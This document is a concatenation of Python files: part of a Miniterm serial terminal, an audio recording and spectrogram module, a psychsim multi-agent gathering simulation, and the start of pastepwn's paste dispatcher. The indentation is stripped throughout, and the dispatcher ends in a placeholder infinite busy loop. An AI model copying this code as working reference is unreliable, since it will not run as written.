sys.stderr.write('--- software flow control %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s\n' % (REPR_MODES[self.repr_mode],))
sys.stderr.write('--- linefeed: %s\n' % (LF_MODES[self.convert_outgoing],))
try:
sys.stderr.write('--- CTS: %s DSR: %s RI: %s CD: %s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive'),
))
except serial.SerialException:
# on RFC 2217 ports it can happen that no modem state notification
# has been received yet. ignore this error.
pass
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive:
data = self.serial.read(1)
if self.repr_mode == 0:
# direct output, just have to care about newline setting
if data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(data)
elif self.repr_mode == 1:
# escape non-printable, let pass newlines
if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
if data == '\n':
sys.stdout.write('\n')
elif data == '\r':
pass
elif data == '\n' and self.convert_outgoing == CONVERT_LF:
sys.stdout.write('\n')
elif data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 2:
# escape all non-printable, including newline
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 3:
# escape everything (hexdump)
for character in data:
sys.stdout.write("%s " % character.encode('hex'))
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
# would be nice if the console reader could be interrupted at this
# point...
raise
def writer(self):
"""loop and copy console->serial until EXITCHARCTER character is
found. when MENUCHARACTER is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = console.getkey()
except KeyboardInterrupt:
c = '\x03'
if menu_active:
if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
self.serial.write(c) # send character
if self.echo:
sys.stdout.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
console.cleanup()
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
file = open(filename, 'r')
sys.stderr.write('--- Sending file %s ---\n' % filename)
while True:
line = file.readline().rstrip('\r\n')
if not line:
break
self.serial.write(line)
self.serial.write('\r\n')
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File %s sent ---\n' % filename)
except IOError, e:
sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
console.setup()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.rts_state = not self.rts_state
self.serial.setRTS(self.rts_state)
sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.dtr_state = not self.dtr_state
self.serial.setDTR(self.dtr_state)
sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.break_state = not self.break_state
self.serial.setBreak(self.break_state)
sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
elif c == '\x01': # CTRL+A -> cycle escape mode
self.repr_mode += 1
if self.repr_mode > 3:
self.repr_mode = 0
sys.stderr.write('--- escape data: %s ---\n' % (
REPR_MODES[self.repr_mode],
))
elif c == '\x0c': # CTRL+L -> cycle linefeed mode
self.convert_outgoing += 1
if self.convert_outgoing > 2:
self.convert_outgoing = 0
self.newline = NEWLINE_CONVERSION_MAP[self.convert_outgoing]
sys.stderr.write('--- line feed %s ---\n' % (
LF_MODES[self.convert_outgoing],
))
#~ elif c in 'pP': # P -> change port XXX reader thread would exit
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
console.cleanup()
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError, e:
sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
self.serial.baudrate = backup
else:
self.dump_port_settings()
console.setup()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character %s ---\n' % key_description(c))
menu_active = False
elif c == MENUCHARACTER: # next char will be for menu
menu_active = True
elif c == EXITCHARCTER:
self.stop()
break # exit app
elif c == '\n':
self.serial.write(self.newline) # send newline character(s)
if self.echo:
sys.stdout.write(c) # local echo is a real newline in any case
sys.stdout.flush()
else:
self.serial.write(c) # send character
if self.echo:
sys.stdout.write(c)
sys.stdout.flush()
except:
self.alive = False
raise
def main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
parser.add_option("-p", "--port",
dest = "port",
help = "port, a number (default 0) or a device name (deprecated option)",
default = None
)
parser.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = 9600
)
parser.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
parser.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
parser.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
parser.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
parser.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
parser.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
parser.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = None
)
parser.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = None
)
parser.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non error messages",
default = False
)
parser.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
parser.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
if port is None: port = 0
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
miniterm.start()
miniterm.join(True)
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
if __name__ == '__main__':
main()
|
audio_module.py | from engine import TextWriter
from engine import SystemState
from engine import Utilities
from engine import Menu
from engine import Events
import pyaudio
import wave
import time
import os
import Queue
import numpy
import fnmatch
import signal
import threading
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
signal.signal(signal.SIGINT, Utilities.GracefulExit)
class AudioState(object):
pass
def Init():
SystemState.AudioState = AudioState
SystemState.AudioState.pyaudio = pyaudio.PyAudio()
SystemState.AudioState.audio_name = None
SystemState.AudioState.audio_file = None
SystemState.AudioState.audio_time = 0
SystemState.AudioState.audio_path = 'media/audio/'
SystemState.AudioState.metadata_path = SystemState.AudioState.audio_path + '.metadata/'
SystemState.AudioState.recording_audio = False
SystemState.AudioState.current_audio_file = None
SystemState.AudioState.audio_message_queue = Queue.Queue()
SystemState.AudioState.audio_player_state = None
MakeAudioPath()
def Process():
button = str(SystemState.pressed_button)
pygame = SystemState.pygame
screen = SystemState.screen
screen_mode = SystemState.screen_mode
if button == 'record':
if SystemState.AudioState.recording_audio == True:
SystemState.AudioState.recording_audio = False
StopRecordingAudio()
else:
TextWriter.Write(
text='Rec',
position=(10, 10),
color=(255,0,0),
state=SystemState,
size=20
)
SystemState.AudioState.recording_audio = True
CallRecordAudio()
elif button == 'play':
Menu.JumpTo(screen_mode=3, toggle=True)
Play()
elif button == 'pause':
Menu.JumpTo(screen_mode=2, toggle=True)
Pause()
elif button == 'library':
SystemState.AudioState.recording_audio = False
Menu.JumpTo(screen_mode=2)
StopRecordingAudio()
OpenLibrary()
Pause()
elif button == 'go_back':
SystemState.AudioState.recording_audio = False
Menu.Back()
elif button == 'rewind':
Rewind()
elif button == 'fast_forward':
FastForward()
elif button == 'next':
if SystemState.AudioState.audio_count > 0:
NextRecording()
elif button == 'previous':
if SystemState.AudioState.audio_count > 0:
PreviousRecording()
elif button == 'delete':
if SystemState.AudioState.audio_count > 0:
Menu.JumpTo(screen_mode=2)
TextWriter.Write(
state=SystemState,
text='Delete?',
position=(125, 75),
size=20
)
elif button == 'accept':
DeleteAudio()
OpenLibrary()
Menu.Back()
elif button == 'decline':
OpenLibrary()
Menu.Back()
def MakeAudioPath():
"""Makes audio path for sound recordings."""
if os.path.exists(SystemState.AudioState.metadata_path) == False:
os.makedirs(SystemState.AudioState.metadata_path)
os.chown(SystemState.AudioState.metadata_path, SystemState.uid, SystemState.gid)
def CallRecordAudio():
"""Creates thread to record audio"""
args = ()
thread = threading.Thread(target=RecordAudio)
thread.setDaemon(True)
thread.start()
def RecordAudio():
"""Records single channel wave file"""
CHUNK = 8192
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = int(SystemState.AudioState.pyaudio.get_device_info_by_index(0)['defaultSampleRate'])
TIMESTAMP = str(int(time.time()))
FILENAME = SystemState.AudioState.audio_path + TIMESTAMP + '.wav'
RECORD_SECONDS = 10800
frames = []
audio_message_queue = None
SystemState.AudioState.audio_message_queue.put({'recording': True})
# Clear stale messages left over from earlier recordings before polling for a stop request.
with SystemState.AudioState.audio_message_queue.mutex:
SystemState.AudioState.audio_message_queue.queue.clear()
# Setting up stream.
stream = SystemState.AudioState.pyaudio.open(
format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
output=True,
frames_per_buffer=CHUNK
)
# Recording data to a wave file.
for i in range(0, int(RATE/CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
try:
audio_message_queue = SystemState.AudioState.audio_message_queue.get(False)
except Queue.Empty:
audio_message_queue = None
if audio_message_queue != None:
if audio_message_queue.get('recording') == False:
break
# Stopping and closing stream.
stream.stop_stream()
stream.close()
# Converting stream data into a wave file.
wavefile = wave.open(FILENAME, 'wb')
wavefile.setnchannels(CHANNELS)
wavefile.setsampwidth(SystemState.AudioState.pyaudio.get_sample_size(FORMAT))
wavefile.setframerate(RATE)
wavefile.writeframes(b''.join(frames))
wavefile.close()
# Opening wave file to read and generate spectrogram.
wavefile = wave.open(FILENAME, 'rb')
_GenerateSpectrogram(wavefile, TIMESTAMP)
wavefile.close()
def StopRecordingAudio():
"""Stops recording audio file."""
SystemState.AudioState.recording_audio = False
audio_action = {'recording': False}
SystemState.AudioState.audio_message_queue.put(audio_action)
def OpenLibrary():
"""Open's the recording library for exploration on screen."""
path = SystemState.AudioState.audio_path
SystemState.AudioState.audio_archive = os.listdir(path)
SystemState.AudioState.audio_archive = [os.path.join(path, audio) for audio in SystemState.AudioState.audio_archive]
SystemState.AudioState.audio_archive = sorted(SystemState.AudioState.audio_archive)
# Keeping only wav files; filtering into a new list avoids the classic
# bug of removing items from a list while iterating over it.
SystemState.AudioState.audio_archive = [
name for name in SystemState.AudioState.audio_archive
if fnmatch.fnmatch(name, '*.wav')
]
SystemState.AudioState.audio_count = len(SystemState.AudioState.audio_archive)
if SystemState.AudioState.audio_count > 0:
SystemState.AudioState.audio_index = SystemState.AudioState.audio_count - 1
SystemState.AudioState.current_audio_file = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
filename = os.path.basename(SystemState.AudioState.current_audio_file)
filename = filename.split('.')[0]
timestamp = filename
filename = SystemState.AudioState.metadata_path + filename + '.png'
timestamp = time.ctime(int(timestamp))
ShowSpectrogram(filename)
else:
TextWriter.Write(
state=SystemState,
text='No Recordings',
position=(95, 100),
size=20
)
def Play():
"""Plays the selected soundbite"""
SystemState.AudioState.audio_player_state = 'Paused'
SystemState.AudioState.audio_name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
SystemState.pygame.mixer.music.load(SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index])
if SystemState.AudioState.audio_player_state == 'Paused' and SystemState.AudioState.audio_time > 2:
SystemState.pygame.mixer.music.play(0, SystemState.AudioState.audio_time)
else:
SystemState.pygame.mixer.music.play(0, 0)
def Pause():
"""Pauses the selected soundbite"""
SystemState.pygame.mixer.music.pause()
SystemState.AudioState.audio_player_state = 'Paused'
SystemState.state_history_direction = 0
SystemState.AudioState.audio_time += SystemState.pygame.mixer.music.get_pos()/1000.0
def BlitImage(filename, pygame, screen):
"""Stamps an image on the screen"""
try:
raw_image = pygame.image.load(filename)
scaled_image = pygame.transform.scale(raw_image, (320, 240))
scaled_x = (320 - scaled_image.get_width()) / 2
scaled_y = (240 - scaled_image.get_height()) / 2
screen.blit(scaled_image, (scaled_x, scaled_y))
except:
screen.fill(0)
TextWriter.Write(
state=SystemState,
text='Spectrogram Not Found',
position=(70, 100),
size=16
)
def ShowSpectrogram(filename):
"""Shows a picture of the spectrogram on the screen"""
pygame = SystemState.pygame
screen = SystemState.screen
BlitImage(filename, pygame, screen)
def FastForward():
"""Move forward in the audio file five seconds"""
SystemState.AudioState.audio_time += 5
SystemState.pygame.mixer.music.play(0, SystemState.AudioState.audio_time)
def Rewind():
"""Moves backward in the audio file five seconds"""
SystemState.AudioState.audio_time -= 5
SystemState.pygame.mixer.music.play(0, SystemState.AudioState.audio_time)
def DeleteAudio():
"""Deletes a selected soundbite and its spectrogram"""
filename = SystemState.AudioState.current_audio_file
filename = filename.split('/')[2].split('.')[0]
metadata_file = SystemState.AudioState.metadata_path + filename + '.png'
try:
os.remove(SystemState.AudioState.current_audio_file)
except: # TODO: print that the audio file couldn't be removed.
print "Couldn't remove audio file"
try:
SystemState.AudioState.audio_archive.remove(SystemState.AudioState.current_audio_file)
except: # TODO: print that file was not removed from library.
print "Couldn't remove from library"
try:
os.remove(metadata_file)
except: # TODO:print that preview couldn't be removed.
print "Couldn't remove preview image"
def NextRecording():
"""Changes to the next recording (Forward in the list)"""
if SystemState.AudioState.audio_index < SystemState.AudioState.audio_count - 1:
SystemState.AudioState.audio_index += 1
else:
SystemState.AudioState.audio_index = 0
name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
filename = name.split('/')[2].split('.')[0]
filename = SystemState.AudioState.metadata_path + filename + '.png'
SystemState.AudioState.audio_name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
Play()
ShowSpectrogram(filename)
def PreviousRecording():
"""Changes to the previous recording (Backwards in the list)"""
if SystemState.AudioState.audio_index > 0:
SystemState.AudioState.audio_index -= 1
else:
SystemState.AudioState.audio_index = SystemState.AudioState.audio_count - 1
name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
filename = name.split('/')[2].split('.')[0]
filename = SystemState.AudioState.metadata_path + filename + '.png'
SystemState.AudioState.audio_name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
Play()
ShowSpectrogram(filename)
def _GenerateSpectrogram(wavefile, timestamp):
"""Generates a spectrogram that works with the recorded sound"""
metadata_path = SystemState.AudioState.metadata_path
filename = metadata_path + timestamp + '.png'
signal = wavefile.readframes(-1)
signal = numpy.fromstring(signal, 'Int16')
framerate = wavefile.getframerate()
plt.title(time.ctime(float(timestamp)), fontsize=24)
plt.subplot(111)
plt.specgram(signal, Fs=framerate, NFFT=128, noverlap=0)
plt.savefig(filename, dpi=100, figsize=(8,6), format='png')
plt.close()
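# --- Illustrative sketch (an assumption, not part of the original module) ---
# RecordAudio and StopRecordingAudio coordinate through audio_message_queue:
# the recorder polls the queue once per chunk and breaks out of its loop when
# it sees {'recording': False}. The same stop protocol without audio hardware:
def _StopProtocolDemo():
    q = Queue.Queue()
    def worker():
        while True:
            try:
                msg = q.get(False)
            except Queue.Empty:
                msg = None
            if msg is not None and msg.get('recording') == False:
                break
            time.sleep(0.01)
    t = threading.Thread(target=worker)
    t.start()
    q.put({'recording': False})  # this is what StopRecordingAudio sends
    t.join()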
|
gathering.py | from psychsim.reward import *
from psychsim.pwl import *
from psychsim.action import *
from psychsim.world import *
from psychsim.agent import *
import psychsim.probability
import pyglet
from pyglet.window import key
from threading import Thread
GATHERERS = 2
TURNS = 10000
class Gathering:
def __init__(self):
self.paused = False
self.world = World()
self.world.defineState(None, 'turns', int)
self.world.setState(None, 'turns', 0)
self.world.addTermination(makeTree({'if': thresholdRow(stateKey(None, 'turns'), TURNS),
True: True, False: False}))
self.agts = []
self.tiles = []
self.create_agents()
for i in range(1,4):
for j in range(1,4):
self.generate_food(i,j)
# Parallel action
#self.world.setOrder([set(self.world.agents.keys())])
#self.world.setOrder([set([tile.name for tile in self.tiles]),set([agent.name for agent in self.agts])])
# Sequential action
self.world.setOrder(self.world.agents.keys())
def create_agents(self):
# Create multiple agents
for i in range(0,GATHERERS):
actor = Agent('Actor'+str(i))
self.world.addAgent(actor)
actor.setHorizon(10)
# States
self.world.defineState(actor.name,'food',int)
self.world.setState(actor.name,'food',0)
self.world.defineState(actor.name,'x',int)
self.world.defineState(actor.name,'y',int)
# Start at different locations
if i==0:
self.world.setState(actor.name,'x',0)
self.world.setState(actor.name,'y',0)
else:
self.world.setState(actor.name,'x',4)
self.world.setState(actor.name,'y',4)
# Nop
'''
action = actor.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
'''
# Increment X position
action = actor.addAction({'verb': 'MoveRight'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics('turns', action, tree)
# Rightmost boundary check
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), '4'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement X position
action = actor.addAction({'verb': 'MoveLeft'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Leftmost boundary check, min X = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Increment Y position
action = actor.addAction({'verb': 'MoveUp'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Topmost boundary check, max Y = 4
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), '4'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement Y position
action = actor.addAction({'verb': 'MoveDown'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Bottommost boundary check, min Y = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
# Maximize your current food count
#actor.setReward(maximizeFeature(stateKey(actor.name,'food')),1.0)
# Models of belief
actor.addModel('Selfish',R={},level=2,rationality=10.,selection='distribution')
actor.addModel('Altruistic',R={},level=2,rationality=10.,selection='distribution')
#actor.addModel('Sadistic',R={},level=2,rationality=10.,selection='distribution')
self.agts.append(actor)
def generate_food(self, i ,j):
location = Agent(str(i) + ',' + str(j))
self.tiles.append(location)
self.world.addAgent(location)
location.setHorizon(1)
self.world.defineState(location.name, 'food', bool)
self.world.setState(location.name, 'food', True)
self.world.defineState(location.name, 'x', int)
self.world.setState(location.name, 'x', i)
self.world.defineState(location.name, 'y', int)
self.world.setState(location.name, 'y', j)
nothing = location.addAction({
'verb': 'nothing'
})
# Probability of spawning a food on the current tile
action = location.addAction({
'verb': 'generate'
})
tree = makeTree({
'distribution': [(setTrueMatrix(stateKey(location.name, 'food')), 0.05), (setFalseMatrix(stateKey(location.name, 'food')), 0.95)]
})
self.world.setDynamics(stateKey(location.name, 'food'), action, tree)
# Can't respawn food if there is already food there
tree = makeTree({
'if': trueRow(stateKey(location.name, 'food')),
True: False,
False: True
})
location.setLegal(action, tree)
# Force food tile to run generate when there's no food
tree = makeTree({
'if': trueRow(stateKey(location.name, 'food')),
True: True,
False: False
})
location.setLegal(nothing, tree)
# If an agent is on a food tile, give the agent the food
for i in range(0,GATHERERS):
action = location.addAction({
'verb': 'food'+str(i)
})
tree = makeTree(setFalseMatrix(stateKey(location.name, 'food')))
self.world.setDynamics(stateKey(location.name, 'food'), action, tree)
tree = makeTree(incrementMatrix(stateKey(self.agts[i].name, 'food'),1))
self.world.setDynamics(stateKey(self.agts[i].name, 'food'), action, tree)
tree = makeTree({
'if': trueRow(stateKey(location.name, 'food')),
True: {'if': equalFeatureRow(stateKey(location.name, 'x'), stateKey(self.agts[i].name,'x')),
True: {'if': equalFeatureRow(stateKey(location.name, 'y'), stateKey(self.agts[i].name,'y')),
True: True,
False: False
},
False: False
},
False: False
})
location.setLegal(action, tree)
# hack: prioritize giving food over no action
location.setReward(achieveFeatureValue(stateKey(location.name,'food'),False),1.)
def modeltest(self,trueModels,A,B,strongerBelief):
agts = self.agts
for i in range(2):
me = agts[i]
other = agts[1-i]
for model in me.models.keys():
print me.models.keys()
if model is True:
name = trueModels[me.name]
else:
name = model
if name == 'Selfish':
me.setReward(maximizeFeature(stateKey(me.name,'food')),1.0,model)
elif name == 'Altruistic':
me.setReward(maximizeFeature(stateKey(me.name,'food')),1.0,model)
me.setReward(maximizeFeature(stateKey(other.name,'food')),1.0,model)
#elif name == 'Sadistic':
# me.setReward(minimizeFeature(stateKey(other.name,'money')),1.0,model)
# me.setReward(maximizeFeature(stateKey(other.name,'money')),1.0,model)
weakBelief = 1.0 - strongerBelief
belief = {'Selfish': weakBelief,'Altruistic': weakBelief}
belief[A] = strongerBelief
self.world.setMentalModel('Actor0','Actor1',belief)
belief = {'Selfish': weakBelief,'Altruistic': weakBelief}
belief[B] = strongerBelief
self.world.setMentalModel('Actor1','Actor0',belief)
def run_without_visual(self):
while not self.world.terminated():
result = self.world.step()
self.world.explain(result, 2)
self.evaluate_score()
# Graphics
def run_with_visual(self):
pyglet.resource.path = ['../resources/gathering']
pyglet.resource.reindex()
SCREEN_WIDTH = 5 * 32
SCREEN_HEIGHT = 5 * 32
window = pyglet.window.Window(resizable=True)
window.set_size(SCREEN_WIDTH, SCREEN_HEIGHT)
tile_image = pyglet.resource.image("black.jpg")
tiles_batch = pyglet.graphics.Batch()
tiles = []
for y in range(0, 5):
for x in range(0, 5):
tiles.append(pyglet.sprite.Sprite(
img=tile_image,
x=x * 32,
y=y * 32,
batch=tiles_batch)
)
goal_image = pyglet.resource.image("green.jpg")
goals_batch = pyglet.graphics.Batch()
goals = []
for i in range(0, 5):
goals_sub = []
for j in range(0, 5):
goals_sub.append(pyglet.sprite.Sprite(
img=goal_image,
x= i * 32 + 1999,
y= j * 32 + 1999,
batch=goals_batch)
)
goals.append(goals_sub)
#agent_image = pyglet.resource.image("white.jpg")
agent0_image = pyglet.resource.image("0.jpg")
agent1_image = pyglet.resource.image("1.jpg")
agents_batch = pyglet.graphics.Batch()
agents = []
for index in range(0, GATHERERS):
if index == 0:
agents.append(pyglet.sprite.Sprite(
img=agent0_image,
x=index * 32,
y=index * 32,
batch=agents_batch))
else:
agents.append(pyglet.sprite.Sprite(
img=agent1_image,
x=index * 32,
y=index * 32,
batch=agents_batch))
@window.event
def on_draw():
window.clear()
tiles_batch.draw()
goals_batch.draw()
agents_batch.draw()
@window.event
def on_key_press(symbol, modifiers):
if symbol == key.P:
self.paused = True
print('Paused')
if symbol == key.U:
self.paused = False
print('Resumed')
def update(dt):
if not self.paused:
result = self.world.step()
self.world.explain(result, 2)
for i in range(1,4):
for j in range(1,4):
val = self.world.getState(str(i)+','+str(j),'food').domain()[0]
#print str(i)+','+str(j)+':'+str(val)
if self.world.terminated():
window.close()
for i in range(0,GATHERERS):
agents[i].x = int(self.world.getState('Actor' + str(i), 'x').domain()[0]) * 32
agents[i].y = int(self.world.getState('Actor' + str(i), 'y').domain()[0]) * 32
for i in range(1,4):
for j in range(1,4):
val = self.world.getState(str(i)+','+str(j),'food').domain()[0]
if val:
goals[i][j].x = i * 32
goals[i][j].y = j * 32
else:
goals[i][j].x = i * 1999
goals[i][j].y = j * 1999
pyglet.clock.schedule_interval(update, 0.1)
# pyglet.app.run()
Thread(target=pyglet.app.run).start()  # pass the function itself; calling it inline would block instead of spawning a thread
# target=pyglet.app.run()
if __name__ == '__main__':
run = Gathering()
trueModels = {'Actor0': 'Selfish',
'Actor1': 'Selfish'}
run.modeltest(trueModels,'Selfish','Selfish',1.0)
run.run_with_visual()
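# The same scenario can also be driven headless (no pyglet window) with
# run.run_without_visual(), which steps the world until termination.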
|
pastedispatcher.py | # -*- coding: utf-8 -*-
import logging
from queue import Empty, Queue
from threading import Event, Lock
from time import sleep
from pastepwn.util import start_thread, join_threads
class PasteDispatcher(object):
"""The PasteDispatcher dispatches the downloaded pastes to the analyzers"""
def __init__(self, paste_queue, action_queue=None, exception_event=None):
self.logger = logging.getLogger(__name__)
self.paste_queue = paste_queue
self.action_queue = action_queue or Queue()
self.analyzers = []
self.running = False
self.__lock = Lock()
self.__threads = []
self.__thread_pool = set()
self.__exception_event = exception_event or Event()
self.__stop_event = Event()
def _pool_thread(self):
# Placeholder for the worker-pool body (see the commented-out pool in start()).
while True:
pass
